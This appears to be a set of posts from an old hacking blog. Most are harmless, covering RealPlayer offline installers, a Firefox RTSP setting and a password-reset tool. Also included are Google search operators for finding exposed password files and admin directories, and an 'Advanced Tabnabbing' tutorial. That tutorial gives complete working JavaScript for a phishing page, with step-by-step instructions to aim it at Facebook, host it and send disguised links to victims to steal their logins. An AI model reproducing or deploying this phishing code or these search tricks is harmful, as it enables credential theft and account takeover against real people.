Face it, there are many home users who are living painfully with monthly bandwidth quota imposed by broadband Internet service provider. So, it is crucial for them to be able download standalone setup file for offline installation.

Trick to download the latest RealPlayer SP standalone offline installer

Direct download the latest official Real Player SP full setup installer.

This is not a hidden, hard-to-find trick but I bet there are people overlook the feature. Let’s see how these steps could help you to download the latest RealPlayer SP 12.0.0.756 full setup file (about 20MB):

1) Go to Real.com and proceed to download that “tiny” RealPlayerSPGold.exe (about 800KB; seems to be a customized download manager).

2) Double click that tiny installer and follow its instructions to proceed as usual.

3) When that tiny setup file starts to download latest installation files, click Cancel button to trigger alternative download option:

The official alternate download of the latest RealPlayer SP 12 standalone offline installer.

After click the “Alternate Installer” button, a dialog box (as shown in the first screenshot) appears to allow user download the 20MB standalone setup file that is good for offline installation.

Firefox Configuration to play live strems with VLC or RealPlayer

Hey Buddies,
                    Today i am gonna explain a very new trick for those who want to view live videos on 2g network , in india most of internet users are using on mobile phones and searching videos daily but the main problem is long time buffering, so to avoid buffering and wathing video as a live stream you have to know about the rtsp(Real Time Streaming) protocol, rtsp is use to stream real time videos on INTERNET like surveillance cams, live TV etc., we can use this protocol on mobile when we watch videos on m.youtube.com, but in pc we have to configure our browser to setup this protocol for viewing unlimited uninterrupted live streams via youtube or any live TV streams. process as follows-
Firefox
1.Configuring Firefox for Streaming Media (Real Player/VLC)

You must install RealPlayer/VLC to open urls with the RTSP protocol (rtsp://) .
Streaming media often uses the RTSP protocol (as evidenced by the link itself, rtsp://address). Firefox does not know how to handle this protocol natively. This can result in the error RTSP is not a registered protocol when you try to access streaming media on the web.
There are several ways to correct the error. We recommend adjusting the Firefox configuration settings by adding an entry for the RTSP protocol:
Open Firefox, and type about:config in the URL bar.
Right click in the main window and select New and then Boolean.
Enter network.protocol-handler.expose.rtsp for the preference name and click OK.
Select false and click OK.
Now Click On the video link and browser says to choose a program to open the link, select real player or vlc player.
Firefox should now be able to correctly associate streaming media with RealPlayer/VLC. To test this, please Open m.youtube.com and click watch video.
Thanks 

Tuesday 24 April 2012

GOOGLE HACKING – BEST SEARCHING GUIDE|Hack the Hackers

An Introduction:

HI, Friends I am back with my new tutorial GOOGLE HACKING. Google (http://www.google.com) can give lots of information to a hacker, to download files etc. The reason is because Google has lots of options on its search engine.
 We know the Google is the best search engine on the Internet. Millions of people searching on Google now. Now, we are faces many problems and time in searching our application or files on internet due to Increasing of webpages, files, and many applications. That’s why hackers exploit much vulnerability. Now I will explain you Google hacking, How to find a specific file or application on internet through Google.

Google search tricks ---

  FileType: We can search for specific files ex. *.xls, *.doc, *.pdf, *.ps, *.ppt, *.rtf, *.db, *.mdb, *.cfg, *.pwd, *.dat, etc.   

 EXAMPLE -- Filetype:xls  "pass"

  Inurl: We can specify a word, and it will return us all urls which contains the word    -    example --  inurl:admin

" Index of " : We can find directory listings of specific folders on servers    example---"index of" admin   or   index.of.admin

  Site: We can find specific sites (domain names) ex. *.com, *.org, *.mi, *.gov, etc.    -     example--- site:gov    or   site:gov "Soprano"

  Intitle: We can find specific urls with a specific title    example---intitle:securityillusions

  Link:  Allows us to check which site links to a specific site    example---link:securityillusions

These are all extreme search engine optimizer commands. So, enjoy fast searching… J

How to reset windows 7 admin password|Hack the Hackers

Anmosoft Windows Password Reset  is designed to recover windows 7 admin password, and other user passwords. With this Windows password recovery tool, you can instantly regain access to your locked computer by burning a bootable CD/DVD or USB flash drive on your own, when you forgot administrator password or domain password on Windows 7/Vista/XP/NT and Windows Server 2008(R2)/2003(R2)/2000.

To get your windows 7 password reset instantly and safely, you can firstly download Anmosoft Windows Password Reset and install it in a computer you have access to. And then insert a USB flash drive to the computer, and burning an ISO image to the USB. And you can set your locked computer to boot from CD ROM or USB. The windows 7 password recovery has been successfully achieved and now you can access your computer without password.

Monday 23 April 2012

Introduction to Hacking| Hack the Hackers

What is a Hacker?


So, what is a hacker? Let's try the Oxford English Dictionary's definition to find out.


hacker /"hak@/ n. me. [f. hack v.1 + -er1.]
1 A person who or thing which hacks (something). me.
2 spec. An enthusiastic computer programmer or user; a person who tries to gain unauthorized access to a computer or to data held in one. colloq.
hackerdom n. the realm or world of computer hackers

The OED Definition of "hacker" is not really very helpful, is it? The relevant part of the OED definition is split between two different types of hacker.




  • An enthusiastic computer programmer or user.
    This is the original meaning of the word hacker. A hacker is someone who enjoys learning and exploring computer and network systems, and consequently gains a deep understanding of the subject. Such people often go on to become systems programmers or administrators, web site administrators, or system security consultants. Hackers such as these, because they spend more time pointing out and securing against system security holes, are sometimes referred to as white-hat hackers.
  • A person who tries to gain unauthorized access to a computer or to data held on one.
    This is the most conventionally understood meaning of the word hackers as propagated in Hollywood films and tabloid newspapers. A lot of people who are quite happy to call themselves hackers by the first definition regard the second group with derision, calling them "crackers", as they specialize in "cracking" system security. Such crackers, who spend all their time finding and exploiting system security holes, are often known as black-hat hackers.
    The reality is full of grey areas. As a white-hat hacker I have legally broken into systems to further my understanding of system security, but I did not specialize in cracking systems security in general. Many of the black-hat hackers I have known are computer enthusiasts who just happen to be most enthusiastic about breaking into systems, and whose knowledge of computers and networking protocols is second to none. At the end of the day, which type of hacker you are depends on your ethics, and whether you are breaking the law or not .
  • Advanced Tabnabbing Tutorial | Hack the Hackers

    Hey friends, today i am going to How to Hack emails, social networking websites and other websites involving login information. The technique that i am going to teach you today is Advanced Tabnabbing. I have already explained what is basic tabnabbing today we will extend our knowledge base, i will explain things with practical example. So lets learn..
    I will explain this tutorial  using attack scenario and live example and how to protect yourself from such stuff.
     Let consider a attack scenario:
     1. A hacker say(me Imran) customizes current webpage by editing/adding some new parameters and variables.( check the code below for details)
     2. I (Imran) sends a copy of this web page to victim whose account or whatever i want to hack.
     3. Now when user opens that link, a webpage similar to this one will open in iframe containing the real page with the help of java script.
     4. The user will be able to browse the website like the original one, like forward backward and can navigate through pages.
     5. Now if victim left the new webpage open for certain period of time, the tab or website will change to Phish Page or simply called fake page which will look absolutely similarly to original one.
     6. Now when user enter his/her credentials (username/password), he is entering that in Fake page and got trapped in our net that i have laid down to hack him.
     Here end's the attack scenario for advanced tabnabbing.

     Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do.  Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 10 years of imprisonment, if got caught in doing so.

     Before coding Part lets first share tips to protect yourself from this kind of attack because its completely undetectable and you will never be able to know that your account is got hacked or got compromised. So first learn how to protect our-self from Advanced Tabnabbing.

     Follow below measure to protect yourself from Tabnabbing:
     1. Always use anti-java script plugin's in your web browser that stops execution of malicious javascripts. For example: Noscript for Firefox etc.
     2. If you notice any suspicious things happening, then first of all verify the URL in the address bar.
     3. If you receive any link in the Email or chat message, never directly click on it. Always prefer to type it manually in address bar to open it, this may cost you some manual work or time but it will protect you from hidden malicious URL's.
     4. Best way is to use any good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks.
     5. If you use ideveloper or Firebug, then verify the headers by yourself if you find something suspicious.

     That ends our security Part. Here ends my ethical hacker duty to notify all users about the attack. Now lets start the real stuff..

     Note: Aza Raskin was the first person to propose the technique of tabnabbing and still we follow the same concept. I will just extend his concept to next level.




     First sample code for doing tabnabbing with the help of iframes:
    <!--
     Title: Advanced Tabnabbing using IFRAMES and Java script
     Author: De$trUcTiVe M!ND (taibamanasa@gmail.com)
    Website: http://www.tanwarimran.blogspot.in
     Version:1.6
     -->

     <html>
     <head><title></title></head>
     <style type="text/css">
     html {overflow: auto;}
     html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
     iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
     </style>
     <body>

     <script type="text/javascript">
     //----------Set Script Options--------------
     var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page
     var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
     var FAKE_PAGE_URL = "http://www.tanwarimran.blogspot.in"; //Set this to the url of the fake page
     var FAKE_PAGE_TITLE = "Hack the Hackers"Next Generation Hackers Portal"; //This sets the title of the fake page
     var REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon.  It will not switch or clear the "Real" favicon in IE.
     var FAKE_FAVICON = "http://www.tanwarimran.blogspot.in/favicon.ico"; //Set's the fake favicon.
     var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
     var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
     //---------------End Options-----------------
     var TIMER = null;
     var SWITCHED = "false";

     //Find Browser Type
     var BROWSER_TYPE = "";
     if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
      BROWSER_TYPE = "Internet Explorer";
     }
     //Set REAL_PAGE_TITLE
     document.title=REAL_PAGE_TITLE;

     //Set FAVICON
     if(REAL_FAVICON){
      var link = document.createElement('link');
      link.type = 'image/x-icon';
      link.rel = 'shortcut icon';
      link.href = REAL_FAVICON;
      document.getElementsByTagName('head')[0].appendChild(link);
     }

     //Create our iframe (tabnab)
     var el_tabnab = document.createElement("iframe");
     el_tabnab.id="tabnab";
     el_tabnab.name="tabnab";
     document.body.appendChild(el_tabnab);
     el_tabnab.setAttribute('src', REAL_PAGE_URL);

     //Focus on the iframe (just in case the user doesn't click on it)
     el_tabnab.focus();

     //Wait to nab the tab!
     if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
      el_tabnab.onblur = function(){
      TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
      }
      el_tabnab.onfocus= function(){
      if(TIMER) clearTimeout(TIMER);
      }
     } else {
      setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
     }

     function TabNabIt(){
      if(SWITCHED == "false"){
      //Redirect the iframe to FAKE_PAGE_URL
      el_tabnab.src=FAKE_PAGE_URL;
      //Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
      if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;

      //Change the favicon -- This doesn't seem to work in IE
      if(BROWSER_TYPE != "Internet Explorer"){
      var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
      for (var i=0; i<links.length; i++) {
      var looplink = links[i];
      if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
      document.getElementsByTagName("head")[0].removeChild(looplink);
      }
      }
      var link = document.createElement("link");
      link.type = "image/x-icon";
      link.rel = "shortcut icon";
      link.href = FAKE_FAVICON;
      document.getElementsByTagName("head")[0].appendChild(link);
      }
      }
     }
     </script>

     </body>
     </html>



    Now what you need to replace in this code to make it working say for Facebook:
     1. REAL_PAGE_URL : www.facebook.com
     2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
     3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
     4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
     5. REAL_FAVICON : www.facebook.com/favicon.ico
     6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
     7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
     8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
     9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page.

     Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anyname.htm and upload it any free web hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).

     That's all for today. I hope you all enjoyed some advanced stuff. If you have any doubts or queries ask me in form of comments.
     A comment of appreciation will do the work..